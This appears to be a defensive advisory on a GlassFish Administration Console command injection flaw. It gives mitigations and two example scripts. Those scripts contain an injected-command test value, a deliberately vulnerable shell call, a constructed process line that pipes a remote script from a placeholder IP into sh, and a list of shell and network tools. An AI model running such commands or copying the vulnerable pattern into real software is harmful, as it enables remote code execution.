Executive Summary
A critical authenticated Remote Code Execution vulnerability (CVE-2026-2586) has been disclosed in the GlassFish Administration Console. Any user with access to the administration panel can craft malicious HTTP requests that trigger arbitrary operating system command execution, running with the privileges of the GlassFish service account.
With a CVSS score of 9.1 (Critical), this vulnerability represents a high-impact risk for any GlassFish deployment where the Administration Console is reachable — even over a private network — and where administrative credentials may have been compromised or shared.
CVSS Score: 9.1 (Critical)
Vulnerability Overview
| Attribute | Value |
|---|---|
| CVE ID | CVE-2026-2586 |
| CVSS Score | 9.1 (Critical) |
| Type | OS Command Injection |
| Attack Vector | Network |
| Attack Complexity | Low |
| Privileges Required | Low (authenticated) |
| User Interaction | None |
| Affected Component | GlassFish Administration Console |
| Public Exploit | Not confirmed at publication |
| Published | 2026-05-19 |
Affected Products
| Product | Status |
|---|---|
| GlassFish Administration Console | Vulnerable |
GlassFish is an open-source Java EE / Jakarta EE application server, originally developed at Sun and then Oracle and now maintained by the Eclipse Foundation as Eclipse GlassFish. The Administration Console is a web-based management interface used to configure deployments, data sources, and server settings. It listens on port 4848 by default. Out of the box it accepts connections only from localhost; remote access, which forces TLS and a non-empty admin password, has to be turned on explicitly with `asadmin enable-secure-admin`, so any console that is reachable over a network has been deliberately exposed.
Technical Details
Vulnerability Root Cause
The Administration Console processes user-supplied input from authenticated requests without adequate sanitization before passing values to OS-level operations. An attacker with valid credentials to the console can supply specially crafted request parameters that inject shell metacharacters or command sequences, which are evaluated by the underlying operating system.
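The pattern described above, as an added example to illustrate the bug class (this is not GlassFish code, and the affected endpoint and parameter are not public, so the "path" parameter and the `ls -ld` operation are stand-ins). It contrasts the string-concatenated shell command that lets `;` and friends through with two fixes: passing an argv list so no shell ever parses the value, and allowlisting the value before it is used at all.

```python
"""Vulnerable vs hardened handling of a user-supplied value passed to an OS command.

Added, illustrative example for this advisory; not GlassFish code. The admin
operation, the `path` parameter and the payload are all hypothetical.
"""
import re
import subprocess

# Constructed attacker value: a valid-looking path followed by a second command.
PAYLOAD = "/tmp; echo INJECTED"


def vulnerable_list(path: str) -> str:
    """Builds a command line by concatenation and hands it to /bin/sh.

    The shell interprets ';', '|', '$(...)', backticks, etc. in `path`,
    which is exactly the failure the advisory describes.
    """
    result = subprocess.run(f"ls -ld {path}", shell=True,
                            capture_output=True, text=True)
    return result.stdout


def argv_list(path: str) -> subprocess.CompletedProcess:
    """Fix 1: no shell. An argv list goes straight to execve, so the whole
    attacker string is a single argument and metacharacters are inert."""
    return subprocess.run(["ls", "-ld", "--", path],
                          capture_output=True, text=True)


# Fix 2: allowlist the value before using it. Only absolute paths made of a
# conservative character set, with no '..' segments, are accepted.
SAFE_PATH = re.compile(r"/[A-Za-z0-9._/-]+")


def hardened_list(path: str) -> str:
    if not SAFE_PATH.fullmatch(path) or ".." in path.split("/"):
        raise ValueError(f"rejected path parameter: {path!r}")
    result = argv_list(path)
    result.check_returncode()   # surface OS errors instead of hiding them
    return result.stdout


def is_rejected(path: str) -> bool:
    """True if the hardened handler refuses the value before running anything."""
    try:
        hardened_list(path)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(vulnerable_list(PAYLOAD))        # second output line reads INJECTED
    print(argv_list(PAYLOAD).returncode)   # non-zero: "no such file", nothing ran
    print(is_rejected(PAYLOAD))            # True: never reaches the OS
```

Both fixes matter: the argv form alone stops the shell from ever seeing the value, but validation is still needed to stop a legitimate tool being pointed at a sensitive path.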
Attack Chain
1. Attacker obtains or guesses valid GlassFish admin credentials (default credentials, credential stuffing, or phishing)
2. Attacker authenticates to the Administration Console (port 4848 by default)
3. A crafted POST request targeting a vulnerable admin endpoint is submitted with an injected OS command payload in a parameter value
4. GlassFish passes the unsanitized parameter to an OS-level function without adequate validation
5. The injected command executes with the privileges of the GlassFish service user (often a dedicated service account, or root in misconfigured deployments)
6. Attacker achieves arbitrary code execution on the host server
Why CVSS 9.1?
The score reflects a network-reachable vulnerability with low attack complexity and no user interaction, where all three impact categories (Confidentiality, Integrity, Availability) are rated High. The only factor in the vector that holds the score below the maximum is the need for authenticated access, and in practice default, shared, or weak admin credentials make that a low barrier. Check the full vector string in the vendor advisory rather than relying on the summary score alone; vendor and NVD scores for the same CVE sometimes differ.
Impact Assessment
| Impact Area | Description |
|---|---|
| Remote Code Execution | Arbitrary commands execute as the GlassFish service user |
| Data Exfiltration | Access to application data, configuration files, and secrets stored on the host |
| Lateral Movement | Compromised server may provide access to internal network resources |
| Credential Theft | GlassFish keystore, database connection passwords, and API keys accessible |
| Service Disruption | Attacker can stop, reconfigure, or corrupt the GlassFish instance |
| Container Escape Risk | Containerized deployments with host mounts may enable broader host access |
Recommendations
Immediate Actions
- Restrict access to the GlassFish Administration Console — port 4848 should never be internet-facing; enforce firewall rules to allow access only from trusted admin subnets
- Change default admin credentials: GlassFish ships with a well-known `admin` account (an empty password in current open-source builds, a documented default in older releases). Set a strong password with `asadmin change-admin-password`, and run `asadmin enable-secure-admin` so the console is served over TLS and refuses blank passwords
- Monitor for an official patch from Oracle or the Eclipse GlassFish project and apply it when available
- Audit admin account access — review who has GlassFish admin credentials and revoke unnecessary access
Network-Level Mitigations
- Block port 4848 (GlassFish Admin Console) at the perimeter firewall
- Restrict access to trusted management VLAN or jump host only
- Enable mutual TLS for the admin console if supported by your version
- Place GlassFish behind a reverse proxy with additional authentication (e.g., mTLS or SSO)
Monitoring
- Alert on unexpected outbound connections from the GlassFish process user
- Monitor for anomalous child processes spawned by the Java service
- Review GlassFish server logs for unexpected admin console access patterns
- Enable audit logging in GlassFish for all administrative actions
Detection Indicators
| Indicator | Description |
|---|---|
| Unexpected child processes from Java/GlassFish PID | Possible command injection execution |
| Outbound connections to unfamiliar IPs from the server | Possible C2 or data exfiltration |
| New files or scripts in GlassFish deployment directories | Possible web shell or backdoor placement |
| Changes to GlassFish configuration without admin session records | Possible unauthorized access |
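The first indicator in the table, as an added detection example that is not part of the advisory: the GlassFish JVM (the DAS) has no normal reason to spawn shells or download tools, so any such descendant of it is worth an alert. The script parses the output of `ps -eo pid,ppid,comm,args` (a standard format), finds JVMs running GlassFish, and walks the process tree for suspicious descendants. The `ps` snapshot below is constructed for the example, including the attacker's `sh -c` child and its `curl` grandchild.

```python
"""Flag suspicious child processes of the GlassFish JVM from `ps` output.

Added example for this advisory, not GlassFish project code. Input is the text
of `ps -eo pid,ppid,comm,args`; the sample snapshot is constructed, not captured.
"""
import re
from dataclasses import dataclass

# Constructed snapshot: a GlassFish DAS (pid 1203) with an injected shell
# under it, plus a legitimate interactive ssh session for contrast.
SAMPLE_PS = """\
  PID  PPID COMMAND         COMMAND
    1     0 systemd         /sbin/init
  812     1 sshd            /usr/sbin/sshd -D
 1203     1 java            /usr/lib/jvm/java-11/bin/java -cp /opt/glassfish/glassfish/modules/glassfish.jar com.sun.enterprise.glassfish.bootstrap.ASMain -domainname domain1
 1420  1203 sh              sh -c ls -ld /tmp; curl http://203.0.113.7/x.sh | sh
 1421  1420 curl            curl http://203.0.113.7/x.sh
 1422  1420 sh              sh
 1500   812 bash            -bash
 1601  1500 ps              ps -eo pid,ppid,comm,args
"""

# Executables a DAS should never be the ancestor of. Extend for your estate;
# in practice any child of the DAS is unusual enough to investigate.
SUSPICIOUS_CHILDREN = {
    "sh", "bash", "dash", "zsh", "curl", "wget", "nc", "ncat", "socat",
    "python", "python3", "perl", "base64",
}

# Heuristic for "this java process is GlassFish": assumed markers in argv.
GLASSFISH_MARKER = re.compile(r"glassfish|ASMain|-domainname", re.IGNORECASE)


@dataclass
class Proc:
    pid: int
    ppid: int
    comm: str
    args: str


def parse_ps(text: str) -> dict:
    """Parse `ps -eo pid,ppid,comm,args` output into {pid: Proc}."""
    procs = {}
    for line in text.splitlines()[1:]:          # skip the header line
        fields = line.split(None, 3)
        if len(fields) < 3:
            continue
        pid, ppid, comm = int(fields[0]), int(fields[1]), fields[2]
        args = fields[3] if len(fields) > 3 else ""
        procs[pid] = Proc(pid, ppid, comm, args)
    return procs


def glassfish_jvms(procs: dict) -> set:
    return {p.pid for p in procs.values()
            if p.comm == "java" and GLASSFISH_MARKER.search(p.args)}


def descends_from(procs: dict, pid: int, ancestors: set) -> bool:
    """Walk the ppid chain upward; guard against cycles in odd snapshots."""
    seen = set()
    cur = procs.get(pid)
    while cur is not None and cur.pid not in seen:
        if cur.ppid in ancestors:
            return True
        seen.add(cur.pid)
        cur = procs.get(cur.ppid)
    return False


def find_suspicious(ps_text: str) -> list:
    """Return Proc records (sorted by pid) that descend from a GlassFish JVM
    and whose executable is on the suspicious list."""
    procs = parse_ps(ps_text)
    jvms = glassfish_jvms(procs)
    hits = [p for p in procs.values()
            if p.pid not in jvms
            and p.comm in SUSPICIOUS_CHILDREN
            and descends_from(procs, p.pid, jvms)]
    return sorted(hits, key=lambda p: p.pid)


if __name__ == "__main__":
    for p in find_suspicious(SAMPLE_PS):
        print(f"ALERT pid={p.pid} ppid={p.ppid} comm={p.comm} args={p.args!r}")
```

Run it periodically, or better, feed the same logic with auditd `execve` records or an EDR process-creation stream so short-lived children (a one-shot `curl`) are not missed between snapshots. The ssh user's `bash` in the sample is not flagged because it does not descend from the JVM.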
Post-Remediation Checklist
- Apply available patch once released by Oracle/Eclipse GlassFish project
- Rotate all credentials associated with the GlassFish instance: admin passwords, database connection strings, and SSL/TLS keystores
- Audit deployed applications for unauthorized modifications or injected code
- Review OS-level accounts the GlassFish service runs as; ensure it uses a minimal-privilege service account
- Verify that firewall rules block port 4848 from all untrusted networks, and test from outside the management subnet rather than trusting the rule listing
- Review audit logs for the timeframe during which the vulnerability was exposed